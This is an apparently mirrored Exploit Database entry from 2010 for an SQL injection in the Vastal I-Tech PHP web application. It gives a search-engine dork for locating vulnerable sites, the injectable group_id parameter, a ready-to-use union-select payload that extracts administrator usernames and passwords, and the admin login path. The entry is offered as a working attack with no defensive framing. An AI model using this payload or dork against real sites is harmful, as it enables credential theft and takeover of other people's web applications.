Vastal I-Tech – SQL Injection

• Exploit Database
• 102 阅读

• 作者： HELLBOY
  日期： 2010-06-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12845/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  ####################################################### # IN THE NAME OF GOD # # Vastal I-Tech SQL Injection Vulnerability # # Author : HELLBOY # # Tested on Lunix # # CVE: N/A # # Email: A68.HELLBOY@GMAIL.COM # # Dork : inurl:"view_group.php?group_id=" ######################################################## # Exploit : # http://[site]/view_group.php?group_id={SQLI} # # EXAM: -1+union+select+group_concat(admin_user,0x3a,admin_password)+from+admin_users-- # # Admin login : # http://www.[sitename].com/admin/ ######################################################### # Greetz : #All members of the ForumWwW.ASHIYANE.ORG & WwW.pars-p30.iR # #########################################################